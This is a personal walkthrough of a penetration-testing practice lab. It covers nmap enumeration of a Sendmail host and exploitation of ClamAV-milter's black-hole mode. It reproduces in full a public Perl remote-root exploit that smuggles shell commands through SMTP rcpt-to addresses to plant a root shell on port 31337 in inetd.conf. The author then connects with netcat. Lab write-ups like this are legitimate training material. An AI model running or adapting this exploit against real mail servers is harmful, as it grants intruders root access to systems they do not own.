This practice lab was meant to test your ability to enumerate heavy and exploit a known vulnerability in the ClamAV (surprise!) filter for SMTP.
The first thing I started with was an nmap scan using scripts, version enumeration, and output into a file.
sudo nmap -sCV -p- -oN nmap/clam 192.168.227.42Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.165], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernelFirst, I note the versions of ssh, smtp, and http. Since port 80 is open I automatically get drawn to find the website. My web enumeration is as follows:
- whatweb — I love this tool, command-line web app analyzer and it's colorful :)
2. View the website
Ahh yes, binary! So the first thing I do when I see this is to open CyberChef
It is clear to me now that I need to pwn this machine, I will not tolerate this. However, this also probably means the foothold is not present in the web application. ClamAV, after doing research, is an SNMP service. In order to identify it's use I utilized another nmap scan using a UDP port scan.
sudo nmap -sU 192.168.227.42The results are numerous, so I decided to only highlight where the services are that caught my eye.
Under port 161 lists ClamAV-milter, running on black hole mode. ClamAV is an antivirus software, and there has been exploit PoCs written because of it's poor input sanitization allowing for remote code execution.
After digging, I found a few exploits
At the very bottom, that matches perfectly with the current stack being used.
Analyzing the code below, I learned that the command attempts to append a new line to the server's configuration file and open a backdoor on port 31337 that provides a root shell to whoever connects.
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]Perfect, executing the public exploit looks like this:
Then, netcat into the port:
Perfect, now we have root access. I am not a n00b :D